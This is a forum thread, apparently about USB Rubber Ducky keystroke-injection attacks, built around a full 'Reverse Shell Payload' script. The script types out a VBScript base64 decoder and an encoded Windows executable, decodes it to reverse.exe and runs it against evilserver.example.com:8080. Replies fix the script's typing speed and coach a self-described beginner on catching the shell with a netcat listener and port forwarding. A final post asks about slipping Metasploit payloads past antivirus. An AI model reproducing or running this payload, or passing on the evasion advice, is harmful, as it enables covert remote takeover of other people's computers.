Jump to content

Recommended Posts

Posted

Any one else having trouble with the Reverse Shell Payload

When It runs the 2 copy cons work, but when it gets to the csript I get the error

c:\decoder.vbs(2 ,32) Microsoft VBScript compilation error: Expected end of statement

Here's a Screenshot of cmd.exe when the error occurs: http://cl.joseb.me/AnTM

Script used in the payload: (The only difference from the one in the wiki is the DELAYS I added to take the screenshot)

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = 
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = 
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function 
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub 
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\reverse.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
DELAY 1500
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
DELAY 1500
STRING c:\reverse.exe evilserver.example.com 8080
DELAY 2000
ENTER
DELAY 2000
STRING exit
ENTER

Posted (edited)

Take a look at the screen shot you posted. Right before the first CONTROL Z you can see the VBScript for decover.vbs did not finish being copied.

Here is the last line

STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub

The output was only

STRING binaryStr

This could have happened because something took focus away from the command prompt. Or, what I have been seeing in my testing is sometimes the ducky pushes strings out too quickly and the machine receiving them can't keep up. I added a STRING_DELAY which will slow down the output of strings to iducke.com, give this script a try.

http://www.iducke.com/Encoder/IDE/b

Edited by ascorbic
  • 2 weeks later...
Posted

Hi guys ! I'm such a Newb :P but can anyone explain to me how to establish a session with the target computer once the the payload has been injected!

I have no idea how this works! Do you have to specify the ip address of your remote computer ( the one you are using to access the target computer) and also what what do you have to change on the script before converting it to a bin file !

Excuse my newness

Thanks

Posted

Hi guys ! I'm such a Newb :P but can anyone explain to me how to establish a session with the target computer once the the payload has been injected!

I have no idea how this works! Do you have to specify the ip address of your remote computer ( the one you are using to access the target computer) and also what what do you have to change on the script before converting it to a bin file !

Excuse my newness

Thanks

It's stated in the code:

STRING c:\reverse.exe evilserver.example.com 8080

@wiki you can find how you can setup the receiving end.

Posted

It's stated in the code:

STRING c:\reverse.exe evilserver.example.com 8080

@wiki you can find how you can setup the receiving end.

thanks for the reply ! I am very unfamiliar with servers. how do i set up one ?

sorry again

thanks

Posted

thanks for the reply ! I am very unfamiliar with servers. how do i set up one ?

sorry again

thanks

You don't have to set up a server you could use your personal wifi router with netcat. You would use your public ip address and a port number above 1024. You will need to forward this port in your router and then listen for that port with netcat. I would suggest using this method for legal purposes.

Posted

Anyone get a working metasploit payload past an AV? I know you can use shellcode to do that but doesn't the victim need to have software installed to run that shellcode?

Has anyone tried implementing a Java click jacking style attack to avoid AV detection?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...